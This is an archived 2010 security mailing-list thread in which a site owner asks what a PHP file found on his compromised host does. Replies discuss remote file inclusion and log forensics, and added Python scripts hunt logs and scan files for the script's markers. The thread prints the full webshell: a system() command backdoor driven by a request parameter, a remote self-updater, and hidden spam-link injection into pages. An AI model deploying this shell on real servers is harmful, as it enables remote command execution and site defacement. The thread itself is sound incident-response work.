PaulDotCom mailing list archives

Odd PHP file, trying to find out what it does


From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Mon, 1 Mar 2010 19:33:13 -0500

Well, Dreamhost responded with something that looked like a form mail,
pointing out some of the outdated scripts I have on my sites. Thing is, most
of those sites are not the ones that were affected, and I have no details
on what the vector was. The logs I have access to don't go that far back.
I've emailed them back to see if I can get the web logs from the time period
when I think the scripts were installed.



Adrian

On Mon, Mar 1, 2010 at 2:35 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:

Googling for the IP "89.149.242.216" and "adsttnmq1" gave me this:

http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041

Looks like the same person hit this guy.

Adrian


On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:

Thanks all. I googled for "adsttnmq1" earlier and found some stuff.
Looking through my logs, I found an IP of a host making a post to one of the
URLs in question. Still looking more into what it was doing.

Thanks
Adrian


On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <only.samurai at gmail.com> wrote:

Historically, I've seen this stuff done through a Remote File Include,
tho I can think of a dozen other ways to get it up on your server. I'd
probably start by digging through the logs looking for someone
including this file in some URL parameter.



On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <jim.halfpenny at gmail.com> wrote:
A search for the string abcdefghiklmnjsweqrtyuiopzx shows another forum
thread with some info on this file:

http://www.webhostingtalk.com/showthread.php?t=876121

I'm sure there are other sources of info out there. Time for some forensic
analysis of your logs to work out how and when this got here. I'm guessing
an automated attack against a known vuln in a PHP app?

Jim

On 1 March 2010 09:16, Adrian Crenshaw <irongeek at irongeek.com> wrote:

Ok, I think one of my sites may have been compromised. I found the
following PHP script on a site, but I'm not sure what it is trying to
do.
Anyone else ever seen this script before?

Adrian

<?php
// Keep running after the requesting client disconnects, with no execution time limit.
ignore_user_abort(1);
set_time_limit(0);

// Clear(): deletes the script's local state files ("c" = generator state,
// "1r" = list of generated link-map pages, "log").
function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}

// Clear2(): reads the path of a target page from the file "m" (one directory up)
// and strips the injected markers, hidden block and links back out of it,
// i.e. undoes what MRepl() and UpKos() did.
function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

// GetVar(): copies a request parameter from POST or GET (GET wins) into $var;
// returns false when the parameter is absent or empty.
function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];

    if (($var) =="")
      return  false;
      else return true;
}

// Gen(): doorway-page generator. Takes a remote base URL in "sg" and a keyword in
// "gm"; keeps its state in the file "c" (top directory, subdirectory, current
// keyword, page counter). On the first run it creates a randomly named directory
// holding a .htaccess fetched from "<sg>2.txt", plus a random subdirectory; every
// call then fetches ten pages from "<sg>sgen.php?g=<keyword>" and writes them as
// "<dir>/<sub>/<keyword>_<n>.htm". When the counter reaches 100 it also fetches a
// link-map page ("<keyword>_lm.htm"), records its path in "1r", and the next call
// starts a fresh subdirectory. $rnd is computed but never used.
function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"];

    if (isset($_POST["gm"]))
      $g = $_POST["gm"];

    if (isset($_GET["gm"]))
        $g = $_GET["gm"];


    $path = "";
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else
    {
        $rnd = mt_rand(0, 999);
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);

        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }

    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }

    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

// Update(): fetches the URL given in parameter "u" and overwrites 1.php (the name
// this script runs under) with the result: a remote self-update.
function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];

    if (isset($_GET['u']))
         $u = $_GET['u'];

     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);

  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

// Com(): passes the value of request parameter "c" to system() with errors
// suppressed: a remote command-execution backdoor.
function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

// UpKos(): rewrites the bare marker strings in the target page into the bracketed
// <adsttnmq1>/<sdioyslkjs2> form that MRepl() and Clear2() look for (migrates an
// older injection format).
function UpKos()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
    $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}


// MRepl(): rewrites the target page named in "m": strips </body>, </html> and any
// earlier injection, then appends the content of request parameter "drs"
// (backslashes removed) inside an invisible zero-size <font> block between the
// markers and restores the closing tags. The fopen() of "mpt" below is never
// read from or closed.
function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
  $endtag = "</font></body></html><sdioyslkjs2> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // ??????? ??????????? ???? ????
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
    $fp = fopen($mpt, "r");
  GetVar("drs", $drs);
  $fin = $fin.$begtag;
$drs = str_replace("\\", "", $drs);
  $fin = $fin.$drs;
  $fin = $fin.$endtag;
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

// Main(): dispatches on whichever control parameter is present (u, c, uk, g, s,
// cl, cl2); with none it prints "<ok>", which lets the operator check that the
// script is still in place.
function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }

    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }

        if (isset($_POST['uk']) || isset($_GET['uk']))
    {
        UpKos();
        exit();
    }

    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }

  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }

    echo "<ok>";

}

Main();

?>

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com






--
Andrew Ellis
http://blog.psych0tik.net
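A log-hunting script for the step Andrew and Jim suggest: find the request that dropped the file (typically a URL parameter carrying a remote URL, the remote-file-include pattern) and the later control requests to it. This is an added example, not code from anyone in this thread; it assumes Apache/nginx combined-format access logs, that the dropped script is served as 1.php (the name Update() writes to on the page), and it runs over constructed sample lines with documentation IP addresses rather than real log data.

```python
import re
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the posted 1.php dispatches on in Main() (u, c, uk, g, s, cl, cl2)
# plus the ones Gen() and MRepl() read (sg, gm, drs, mpt).
CONTROL_PARAMS = {"u", "c", "uk", "g", "s", "cl", "cl2", "sg", "gm", "drs", "mpt"}

# Apache/nginx "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log (documentation IPs); not taken from the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2010:02:14:33 -0500] "GET /gallery/index.php?page=http://198.51.100.7/k.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [01/Mar/2010:02:15:01 -0500] "GET /index.php HTTP/1.1" 200 4017 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Mar/2010:02:16:10 -0500] "POST /gallery/1.php HTTP/1.1" 200 4 "-" "-"
192.0.2.10 - - [01/Mar/2010:02:16:12 -0500] "GET /gallery/1.php?g=1&sg=http://198.51.100.7/s/&gm=cheap HTTP/1.1" 200 0 "-" "-"
203.0.113.5 - - [01/Mar/2010:02:20:00 -0500] "GET /gallery/index.php?page=about HTTP/1.1" 200 3312 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of the captured fields, or None for an unparseable line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec, shell_names=("1.php",)):
    """List the reasons one request is suspicious (empty list = nothing found)."""
    findings = []
    parts = urlsplit(rec["target"])
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    basename = parts.path.rsplit("/", 1)[-1]
    if basename in shell_names:
        used = sorted(CONTROL_PARAMS & set(params))
        if used:
            findings.append(f"shell control parameter(s) {used}")
        if rec["method"] == "POST":
            findings.append("POST to suspected shell (body not logged)")
    for name, value in params.items():
        # parse_qsl already decoded once; a second unquote catches double-encoded values.
        if REMOTE_URL_RE.match(unquote(value)):
            findings.append(f"remote URL in parameter {name!r} (possible RFI)")
    return findings


def hunt(lines, shell_names=("1.php",)):
    """Return suspicious requests as (time, ip, method, target, findings), oldest first."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec, shell_names)
        if findings:
            hits.append((rec["time"], rec["ip"], rec["method"], rec["target"], findings))
    hits.sort(key=lambda h: datetime.strptime(h[0], TIME_FMT))
    return hits


def source_ips(hits):
    """Distinct client addresses behind the hits, for blocking and correlation."""
    return sorted({h[1] for h in hits})


def first_seen(hits):
    """Timestamp of the earliest suspicious request: bounds the compromise window."""
    return hits[0][0] if hits else None


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG.splitlines())
    for time, ip, method, target, findings in found:
        print(f"{time} {ip} {method} {target}")
        for f in findings:
            print("    -", f)
    print("sources:", source_ips(found), "first seen:", first_seen(found))
```

Feed it the real access logs with `hunt(open(path))` and widen `shell_names` to any other unexpected PHP files found on the host; the earliest hit with a remote URL in a parameter is the candidate entry point, and the POST hits are the ones whose parameters the log cannot show, which is why the file-system side also needs checking.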




-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100301/a6708920/attachment.htm 
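At the file-system level the script in the thread leaves two kinds of traces: copies of itself (the marker strings such as adsttnmq1 and the letter alphabet used by Gen()) and pages it has altered through MRepl(), which carry the <adsttnmq1> and <sdioyslkjs2> markers, a zero-size hidden <font> wrapper and the injected links. The scanner below walks a web root and reports both, listing the injected links so they can be reviewed before the pages are cleaned. It is an added example and not from anyone in the thread; the web root it scans is a constructed temporary tree built by build_sample_site(), and the indicator list is taken from the posted script only.

```python
import os
import re
import tempfile

# Markers and strings the posted script writes into pages or contains itself.
INJECT_RE = re.compile(r"<adsttnmq1>(.*?)<sdioyslkjs2>", re.S)
DD_RE = re.compile(r"<!--dd4-->(.*?)<!--dd5-->", re.S)
HIDDEN_FONT_RE = re.compile(
    r'<font style="position:\s*absolute;\s*overflow:\s*hidden;\s*height:\s*0;\s*width:\s*0">', re.I)
HREF_RE = re.compile(r"""<a\s[^>]*href=["']([^"']+)""", re.I)
SHELL_INDICATORS = ("adsttnmq1", "sdioyslkjs2", "abcdefghiklmnjsweqrtyuiopzx", "sgen.php", "<!--dd4-->")


def scan_php(text):
    """Indicator strings from the posted script that occur in a PHP file."""
    return [s for s in SHELL_INDICATORS if s in text]


def scan_html(text):
    """Count injected blocks, flag the hidden-font wrapper and collect the links they carry."""
    blocks = INJECT_RE.findall(text) + DD_RE.findall(text)
    return {
        "blocks": len(blocks),
        "hidden_font": bool(HIDDEN_FONT_RE.search(text)),
        "links": [href for block in blocks for href in HREF_RE.findall(block)],
    }


def scan_tree(root):
    """Walk a web root; return {relative path: finding} for shell copies and injected pages."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name.lower().endswith(".php"):
                found = scan_php(text)
                if found:
                    report[rel] = {"type": "shell", "indicators": found}
            elif name.lower().endswith((".htm", ".html")):
                result = scan_html(text)
                if result["blocks"] or result["hidden_font"]:
                    report[rel] = {"type": "injected", **result}
    return report


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_sample_site():
    """Constructed web root: a clean page, a page altered the way MRepl() alters
    pages, a stand-in for the dropped script (marker strings only) and a clean PHP file."""
    root = tempfile.mkdtemp(prefix="site_")
    _write(root, "index.html", "<html><body><h1>Home</h1></body></html>\n")
    _write(root, "about.html",
           '<html><body><p>About us</p>'
           '<adsttnmq1><font style="position: absolute;overflow: hidden;height: 0;width: 0">'
           '<a href="http://spam.invalid/one">one</a> <a href="http://spam.invalid/two">two</a>'
           '</font></body></html><sdioyslkjs2> ')
    _write(root, "images/1.php",
           '<?php // constructed stand-in: carries only the posted script\'s marker strings\n'
           '$alp = "abcdefghiklmnjsweqrtyuiopzx"; $gname = $sg."sgen.php";\n')
    _write(root, "images/helper.php", "<?php echo 'nothing to see';\n")
    return root


if __name__ == "__main__":
    for rel, finding in sorted(scan_tree(build_sample_site()).items()):
        print(rel, finding)
```

Point `scan_tree()` at the real document root to get the list of files to restore from a clean backup; the injected pages are exactly the ones the script's own Clear2() would later scrub, so the markers are a reliable indicator until the attacker runs that cleanup. The randomly named three- and five-letter directories that Gen() creates (all letters drawn from the same alphabet) are a further thing to look for by hand, since their names alone are not distinctive enough to match safely.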

